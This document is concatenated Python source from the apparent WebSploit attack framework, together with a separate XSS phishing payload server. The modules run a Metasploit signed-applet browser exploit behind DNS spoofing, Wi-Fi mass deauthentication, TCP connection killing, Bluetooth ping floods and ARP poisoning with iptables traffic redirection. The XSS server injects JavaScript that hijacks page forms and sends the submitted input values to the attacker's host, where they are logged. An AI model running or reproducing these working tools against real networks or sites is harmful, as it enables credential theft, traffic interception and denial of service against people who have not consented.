			java_applet()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t\t RQ\t Description"
			print "---------\t--------------\t\t\t----\t--------------"
			print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
			print "LHOST\t\t"+options[1]+"\t\t\tyes\tLocal IP Address"
			print "Class\t\t"+options[2]+"\t\t\t\tyes\tApplet's Class Name"
			print "Publisher\t"+options[3]+"\t\t\t\tyes\tPublisher's Name"
			print ""	
			java_applet()
		elif com[0:2] =='os':
			os.system(com[3:])
			java_applet()
		elif com[0:4] =='help':
			help.help()
			java_applet()
		elif com[0:4] =='back':
			pass			
		elif com[0:3] =='run':
			print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Setting Up , Wait A Few Seconds ..." + wcolors.color.ENDC)
			subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			sleep(2)
			os.chdir('//tmp')
			check_tmp = os.listdir(os.curdir)
			if 'fillter.dns' in check_tmp:
				os.system('rm -rf fillter.dns')
			myfillter = open('fillter.dns', 'w')
			myfillter.write(options[1] + ' *\n')
			myfillter.close()
			os.chdir('/var/www')
			check_tmp2 = os.listdir(os.curdir)
			if 'index.html' in check_tmp2:
				os.system('rm -rf index.html')
			myindex = open('index.html', 'w')
			myindex.write('<html>\n')
			myindex.write('<body>\n')
			myindex.write('<h3><center>Wait a Few Seconds ...</center></h3>\n')
			myindex.write('<center><iframe src=http://' + options[1] + ':8080/index></iframe></center>\n')
			myindex.write('</body>\n')
			myindex.write('</html>\n')
			myindex.close()
			xterm1 = 'dnsspoof -i '+ options[0] + ' -f tmp//fillter.dns'
			subprocess.Popen(xterm1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			sleep(2)
			print(wcolors.color.YELLOW + "[*]Your Index Has Been Changed...")
			print("[*]You Can Change The Index From Here => /var/www/index.html")
			print("[*]But Don\'t Forget Your IP Address, Write It In <iframe> Tag" + wcolors.color.ENDC)
			print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Engine Has Been Started ... Wait For Victim Click ..." + wcolors.color.ENDC)
			exploit = 'msfcli exploit/multi/browser/java_signed_applet APPLETNAME=' + options[2] + ' CERTCN=' + options[3] + ' URIPATH=index E'
			os.system(exploit)
		else:
			print "Wrong Command => ", com
			java_applet()
	except(KeyboardInterrupt):
		print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)	



#!/usr/bin/evn python

# XSS Phishing attack

# Written by Kyle Osborn
# kyle@kyleosborn.com
# GPLv2 License

# Logs data to an XML file. An XML parser will be created soon, or you can do it yourself.

# This is not an exploit tool, it's a payload tool.
# Once you've found the exloit, and you're able to inject javascript,
# just stick this in there as a script.
# <script src="http://YOURIP/">


# Proper HTTP Referers must be sent by the victim. If this is spoofed, or disabled, there will be odd results.

# Requirements - Everything below this line
import urllib2,BeautifulSoup,urlparse,datetime,re
from xml.dom import minidom
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler


# Interface you want to bind to
bind = "0.0.0.0"
# Port
port = 8000
# Location of reports
reports = "./reports"


class RequestHandler(BaseHTTPRequestHandler):

	def do_GET(self):
		
		try:
			if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
				
				
				if self.path == '/':
					print '[-] Incoming connection from %s' % self.client_address[0]
					self.send_response(200) 
					self.send_header('Content-Type', 'text/javascript')	
					self.send_header('Cache-Control', 'no-cache, must-revalidate')
					self.end_headers()
					
					print '[-] Grabbing payload from %s' % self.headers["Referer"]
					self.prep_payload()
					
					self.wfile.write(self.send_payload())
					
					print '[-] Exploit sent to %s' % self.client_address[0]
				elif self.path[0:11] == '/spacer.gif':
					print '[*] Rceiving data from %s' % self.client_address[0]
					self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
					self.referer_host = self.referer_host.split("/")[0].split(".")
					self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
					print self.referer_host
					self.send_response(200)
					self.send_header('Content-Type', 'image/gif')
					self.send_header('Cache-Control', 'no-cache, must-revalidate')
					self.end_headers()
					self.capture()
						
				
			else:
				#self.headers["Referer"] = "http://google.com/"
				print '[-] Incoming connection from %s' % self.client_address[0]
				print '[!] No referer'
		except KeyError:
			#self.headers["Referer"] = "http://google.com/"
			print '[-] Incoming connection from %s' % self.client_address[0]
			print '[!] No referer'

	def send_payload(self):
		return self.payload
	
	def prep_payload(self):
		js_payload = {}
		js_payload[0]  = """
				function func() {
					document.getElementsByTagName('body')[0].innerHTML = \""""
		js_payload[2]  = """\";
		
				var formslength =document.getElementsByTagName('form').length;
				for(var i=0; i<formslength; i++){
					document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
				}
			}
		
			function myOnSubmit(form) {
				data = \"\";
				for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
						data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
				}
		
				var img = document.createElement('img');
				img.src = \""""
		js_payload[4] = """?\"+data+\"\";
					img.setAttribute('width', '100%');
					img.setAttribute('height', '100%');
					document.getElementsByTagName('body')[0].appendChild(img);
					pause(500);
					return true;
				}
		
				function pause(milsec){
					var date = new Date();
					var curDate = null;
					do { curDate = new Date(); }
					while(curDate-date < milsec);
				}
		
				func();
				document.execCommand('Stop');
				"""
	
		js_payload[1] = str(self.served())
		js_payload[1] = js_payload[1].replace("\"","\\\"")
		
		
		js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
		
		full_payload = ""
		
		#js_payload[0] = js_payload[0].replace("\t","").replace(","")
		js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
		#js_payload[2] = js_payload[2].replace("\t","").replace(","")
		#js_payload[4] = js_payload[4].replace("\t","").replace(","")
		
		for i in js_payload:
			#if i != 1 or i != 3:
				#js_payload[i] = tmp.replace(" ","").replace("\t","").replace(","")
			full_payload += str(js_payload[i])
		#self.payload = full_payload.replace(" ","").replace("\t","").replace(","")
		self.payload = full_payload
		
	def served(self):
		t = urllib2.urlopen(self.headers["Referer"])
		html = t.read()
		soup = BeautifulSoup.BeautifulSoup(html)
		body = soup.find(["body"])
		return body


	def capture(self):
		self.generated_on = str(datetime.datetime.now())
		self.path = self.path.split("?")[1].split(" ")[0]
		dict = urlparse.parse_qs(self.path)
		
		meta = {}
		meta['ip'] = self.client_address
		meta['browser'] = [self.headers["User-Agent"]]
		meta['referer'] = [self.headers["Referer"]]
		
		
		print "[+] Generating XML.."
		
		root = Element('XSS')
		root.set('version', '1.0')
		request = SubElement(root, 'request')
		
			
		site = SubElement(request, 'site')
		site.text = self.address_string()
		date = SubElement(request, 'date')
		date.text = self.generated_on
		requestLine = SubElement(request, 'requestLine')
		requestLine.text = self.requestline
		
		
		metaData = SubElement(request, 'meta')
		for key, value in meta.iteritems():
			ele = SubElement(metaData, key)
			#print value
			ele.text = value[0]
		
		
		formData = SubElement(request, 'formData')
		
		print '[*] Data received:'
		for key, value in dict.iteritems():
			if key == "":
				key = "UNDEFINED"
			print '[-] \t '+ str(key)+' => '+str(value)
			ele = SubElement(formData, key)
			ele.text = value[0]
		
			
		self.log_data(self.prettify(root))


	def prettify(self,elem):
		"""Return a pretty-printed XML string for the Element.
		"""
		rough_string = ElementTree.tostring(elem, 'utf-8')
		#print rough_string
		reparsed = minidom.parseString(rough_string)
		return reparsed.toprettyxml(indent="  ")

	def log_data(self,data):
		report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
		report.write(data)
		report.close

print "Starting server on %s:%s...\n" % (bind,port)
try:
	serv = HTTPServer((bind, port), RequestHandler)
	print "[*] Server has started"
	serv.serve_forever()
except:
	print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)



#!/usr/bin/env python
#
# WebSploit Framework Mass De-authentication module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import help
from core import wcolors

options = ["wlan0", "00:00:00:00:00:00", "/tmp/essid.txt", "5", "mon0"]
def mass_deauth():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1+= ":"
		line_1+= wcolors.color.UNDERL + wcolors.color.BLUE + "Mass_Deauth" + wcolors.color.ENDC
		line_1+= " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:13] == 'set interface':
			options[0] = com[14:20]
			print "INTERFACE => ", options[0]
			mass_deauth()
		elif com[0:9] == 'set bssid':
			options[1] = com[10:]
			print "BSSID => ", options[1]
			mass_deauth()
		elif com[0:14] == 'set essid_file':
			options[2] = com[14:]
			print "ESSID_FILE => ", options[2]
			mass_deauth()
		elif com[0:14] == 'set packet_len':
			options[3] = com[14:]
			print "PACKET_LEN => ", options[3]
			mass_deauth()
		elif com[0:7] == 'set mon':
			options[4] = com[8:12]
			print "MON => ", options[4]
			mass_deauth()
		elif com[0:2] =='os':
			os.system(com[3:])
			mass_deauth()
		elif com[0:4] =='help':
			help.help()
			mass_deauth()
		elif com[0:4] =='back':
			pass
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t\t RQ\t Description"
			print "---------\t--------------\t\t\t----\t--------------"
			print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
			print "bssid\t\t"+options[1]+"\t\tyes\tTarget Access Point BSSID"
			print "essid_file\t"+options[2]+"\t\t\tyes\tFile Contain Client ESSID"
			print "packet_len\t"+options[3]+"\t\t\t\tyes\tNumber of Packets"
			print "mon\t\t"+options[4]+"\t\t\t\tyes\tMonitor Mod(default)"
			print "\n"
			mass_deauth()
		elif com[0:3] =='run':
			print wcolors.color.GREEN + "[*] Loading %s"%options[2] + wcolors.color.ENDC
			try:
				f = open(options[2], "r").readlines()
			except Exception, e:
				print wcolors.color.RED + "Error : %s"%e + wcolors.color.ENDC
				mass_deauth()

			print wcolors.color.GREEN + "[*] Enabling Monitor Mod on %s"%options[0]
			try:
				monitor_mod = "airmon-ng start %s" % (options[0])
				subprocess.Popen(monitor_mod, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
			except Exception, e:
				print wcolors.color.RED + "Error : %s"%e + wcolors.color.ENDC
				mass_deauth()
			for essids in f:
				essids = essids.strip("\n")
				print wcolors.color.GREEN + "[*] Attempting to De-authentication %s"%essids + wcolors.color.ENDC
				command = "aireplay-ng -0 5 -a %s -c %s %s"%(options[1], essids, options[4])
				os.system(command)
			print wcolors.color.GREEN + "[*] Disabling Monitor Mod ..." + wcolors.color.ENDC
			disable_mon = "airmon-ng stop %s"%options[4]
			subprocess.Popen(disable_mon, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
			print wcolors.color.GREEN + "[*] Done."+ wcolors.color.ENDC
			mass_deauth()
		else:
			print "Wrong Command => ", com
			mass_deauth()
	except(KeyboardInterrupt):
		print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)


#!/usr/bin/env python
#
# WebSploit FrameWork Update Module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from core import wcolors
from time import sleep

def update():
    print(wcolors.color.BLUE + "[*] Use wsf-update.py script for update, you can find this script in installation folder [/usr/share/websploit]" + wcolors.color.ENDC)
    pass



#!/usr/bin/env python
#
# WebSploit Framework Web Killer (TCPKill) module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from time import sleep
from core import wcolors
from core import help
options =["eth0", "www.google.com"]
def webkiller():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "WebKiller" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] =='set interface':
            options[0] = com[14:20]
            print "INTERFACE => ", options[0]
            webkiller()
        elif com[0:10] =='set target':
            options[1] = com[11:]
            print "TARGET => ", options[1]
            webkiller()
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
            print "TARGET\t\t"+options[1]+"\t\t\tyes\tTarget Web Address"
            print ""
            webkiller()
        elif com[0:2] =='os':
            os.system(com[3:])
            webkiller()
        elif com[0:4] =='help':
            help.help()
            webkiller()
        elif com[0:4] =='back':
            pass
        elif com[0:3] =='run':
            print (wcolors.color.BLUE + "[*]IP Forwarding ..." + wcolors.color.ENDC)
            subprocess.Popen('echo 1 > /proc/sys/net/ipv4/ip_forward', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            sleep(2)
            command_1 = 'tcpkill -i ' + options[0] +' -9 host ' + options[1]
            subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            line_3 = wcolors.color.GREEN + "[*]Attack Has Been Started, For Stop Attack Press [enter] Key..." + wcolors.color.ENDC
            press_ak = raw_input(line_3)
            os.system('killall tcpkill')
            print (wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Stoped." + wcolors.color.ENDC)
        else:
            print "Wrong Command => ", com
            webkiller()
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
# WebSploit Framework Bluetooth Ping Of Death module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from time import sleep
from core import help
from core import wcolors

options = ["hci0", "", "600"]
def bluetooth_pod():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Bluetooth_POD" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] =='set interface':
            options[0] = com[14:19]
            print "interface => ", options[0]
            bluetooth_pod()
        elif com[0:10] =='set bdaddr':
            options[1] = com[11:28]
            print "bdaddr => ", options[1]
            bluetooth_pod()
        elif com[0:8] =='set size':
            options[2] = com[9:12]
            print "size => ", options[2]
            bluetooth_pod()
        elif com[0:2] =='os':
            os.system(com[3:])
            bluetooth_pod()
        elif com[0:4] =='help':
            help.help()
            bluetooth_pod()
        elif com[0:4] =='back':
            pass
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "interface\t"+options[0]+"\t\t\t\tyes\tBluetooth Interface Name"
            print "bdaddr\t\t"+options[1]+"\t\t\t\tyes\tTarget Bluetooth Address"
            print "size\t\t"+options[2]+"\t\t\t\tyes\tSize of packets (Default 600)"
            print ""
            bluetooth_pod()
        elif com[0:4] =='scan':
            os.system("hcitool scan")
            print ""
            bluetooth_pod()
        elif com[0:3] =='run':
            print(wcolors.color.BLUE + "[*]Bluetooth Ping Of Death Attack Started ..." + wcolors.color.ENDC)
            try:
                for i in range(1, 10000):
                    xterm_1 = "l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
                    subprocess.Popen(xterm_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                    sleep(3)
            except(KeyboardInterrupt, OSError):
                print(wcolors.color.RED + "[!] Something Is Wrong ! Websploit Bluetooth_POD Module Exit." + wcolors.color.ENDC)
            bluetooth_pod()
        else:
            print "Wrong Command => ", com
            bluetooth_pod()
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
# WebSploit Framework ARP Poisoner module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from core import help
from core import wcolors
from scapy.all import *
from time import sleep

options = ["eth0", "192.168.1.1", "192.168.1.2", "192.168.1.3"]
def arp_poisoner():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP_Poisoner" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] == 'set interface':
            options[0] = com[14:20]
            print "INTERFACE => ",options[0]
            arp_poisoner()
        elif com[0:10] == 'set router':
            options[1] = com[11:26]
            print "ROUTER => ", options[1]
            arp_poisoner()
        elif com[0:10] == 'set target':
            options[2] = com[11:26]
            print "TARGET => ", options[2]
            arp_poisoner()
        elif com[0:9] =='set lhost':
            options[3] = com[10:25]
            print "LHOST => ", options[3]
            arp_poisoner()
        elif com[0:2] =='os':
            os.system(com[3:])
            arp_poisoner()
        elif com[0:4] =='help':
            help.help()
            arp_poisoner()
        elif com[0:4] =='back':
            pass
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
            print "ROUTER\t\t"+options[1]+"\t\t\tyes\tRouter IP Address"
            print "TARGET\t\t"+options[2]+"\t\t\tyes\tTarget IP Address"
            print "LHOST\t\t"+options[3]+"\t\t\tyes\tLocal IP Address"
            print ""
            arp_poisoner()
        elif com[0:3] =='run':
            print (wcolors.color.BLUE + "[*]Setting Up ..." + wcolors.color.ENDC)
            exec1 = "echo 1 > /proc/sys/net/ipv4/ip_forward"
            exec2 = "echo 0 > /proc/sys/net/ipv4/conf/%s/send_redirects" % (options[0])
            exec3 = "iptables --flush"
            exec4 = "iptables --zero"
            exec5 = "iptables --delete-chain"
            exec6 = "iptables -F -t nat"
            exec7 = "iptables --append FORWARD --in-interface %s --jump ACCEPT" % (options[0])
            exec8 = "iptables --table nat --append POSTROUTING --out-interface %s --jump MASQUERADE" % (options[0])
            exec9 = "iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination %s" % (options[3])
            exec10= "iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination %s" % (options[3])
            print(wcolors.color.BLUE + "[*]IP Forwarding ... " + wcolors.color.ENDC),
            subprocess.Popen(exec1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            sleep(0.5)
            print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
            print(wcolors.color.BLUE + "[*]Configuring Iptables ... " + wcolors.color.ENDC),
            subprocess.Popen(exec3, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec4, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec5, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec6, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec7, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec8, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            sleep(0.5)
            print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
            print(wcolors.color.BLUE + "[*]Redirect Traffic on %s ... " + wcolors.color.ENDC) % (options[3]),
            subprocess.Popen(exec9, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen(exec10, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            sleep(0.5)
            print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
            sleep(1)
            print(wcolors.color.BLUE + "[*]ARP Poisoning Has Been Started ..." + wcolors.color.ENDC)
            packet = ARP()
            packet.psrc = options[1]
            packet.pdst = options[2]
            try:
                while 1:
                    send(packet, verbose=0)
                    sleep(50)
            except:
                print (wcolors.color.RED + "[!]Something Wrong , Cannot Send Packet!")
                pass
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
#Websploit FrameWork Upgrade Module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import urllib
from time import sleep
from core import wcolors
import webbrowser

def upgrade():
    print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Checking For New Version, Please Wait ..." + wcolors.color.ENDC)
    try:
        cu = urllib.urlopen("http://sourceforge.net/projects/websploit/files/")
        res = cu.read()
        if 'WebSploit Framework V.3.0.1' in res:
            print(wcolors.color.GREEN + "[*]New Version Available")
            sleep(2)
            print("[*]Download Latest Version : https://sourceforge.net/projects/websploit/files/latest/download?source=files" + wcolors.color.ENDC)
            print(wcolors.color.CYAN + "[*]Starting Browser To Download Location, Please Wait ..." + wcolors.color.ENDC)
            sleep(2)
            webbrowser.open("https://sourceforge.net/projects/websploit/files/latest/download?source=files")
        else:
            print(wcolors.color.BOLD + wcolors.color.RED + "[*]New Version Not Available, This Is Latest Version Of The WebSploit Framework." + wcolors.color.ENDC)
            sleep(4)
    except(IOError):
        print(wcolors.color.BOLD + wcolors.color.RED + "[*]Connection Timeout, Check Your Internet Connection!" + wcolors.color.ENDC)


#!/usr/bin/env python
#
# WebSploit FrameWork Help Module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

from core import wcolors
from time import sleep
def help():
    print "\n"
    print (wcolors.color.BLUE + "Commands\t\tDescription" + wcolors.color.ENDC)
    print (wcolors.color.GREEN + "---------------\t\t----------------" + wcolors.color.ENDC)
    print "set \t\t\tSet Value Of Options To Modules"
    print "scan\t\t\tScan Wifi (Wireless Modules)"
    print "stop\t\t\tStop Attack & Scan (Wireless Modules)"
    print "run \t\t\tExecute Module"
    print "use \t\t\tSelect Module For Use"
    print "os \t\t\tRun Linux Commands(ex : os ifconfig)"
    print "back\t\t\tExit Current Module"
    print "show modules\t\tShow Modules of Current Database"
    print "show options\t\tShow Current Options Of Selected Module"
    print "upgrade\t\t\tGet New Version"
    print "update\t\t\tUpdate Websploit Framework "
    print "about\t\t\tAbout US"
    print ""


#!/usr/bin/env python
#
#Websploit FrameWork Database Module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

from core import wcolors
from time import sleep
def modules_database():
    print ""
    print (wcolors.color.BLUE + "Web Modules\t\t\tDescription" + wcolors.color.ENDC)
    print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
    print "web/apache_users\t\tScan Directory Of Apache Users"
    print "web/dir_scanner\t\t\tDirectory Scanner"
    print "web/wmap\t\t\tInformation Gathering From Victim Web Using (Metasploit Wmap)"
    print "web/pma\t\t\t\tPHPMyAdmin Login Page Scanner"
    print "web/cloudflare_resolver\t\tCloudFlare Resolver"
    print "\n"
    print (wcolors.color.BLUE + "Network Modules\t\t\tDescription" + wcolors.color.ENDC)
    print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
    print "network/arp_dos\t\t\tARP Cache Denial Of Service Attack"
    print "network/mfod\t\t\tMiddle Finger Of Doom Attack"
    print "network/mitm\t\t\tMan In The Middle Attack"
    print "network/mlitm\t\t\tMan Left In The Middle Attack"
    print "network/webkiller\t\tTCP Kill Attack"
    print "network/fakeupdate\t\tFake Update Attack Using DNS Spoof"
    print "network/arp_poisoner\t\tArp Poisoner"
    print "\n"
    print (wcolors.color.BLUE + "Exploit Modules\t\t\tDescription" + wcolors.color.ENDC)
    print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
    print "exploit/autopwn\t\t\tMetasploit Autopwn Service"
    print "exploit/browser_autopwn\t\tMetasploit Browser Autopwn Service"
    print "exploit/java_applet\t\tJava Applet Attack (Using HTML)"
    print "\n"
    print (wcolors.color.BLUE + "Wireless / Bluetooth Modules\tDescription" + wcolors.color.ENDC)
    print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
    print "wifi/wifi_jammer\t\tWifi Jammer"
    print "wifi/wifi_dos\t\t\tWifi Dos Attack"
    print "wifi/wifi_honeypot\t\tWireless Honeypot(Fake AP)"
    print "wifi/mass_deauth\t\tMass Deauthentication Attack"
    print "bluetooth/bluetooth_pod\t\tBluetooth Ping Of Death Attack"
    print "\n"
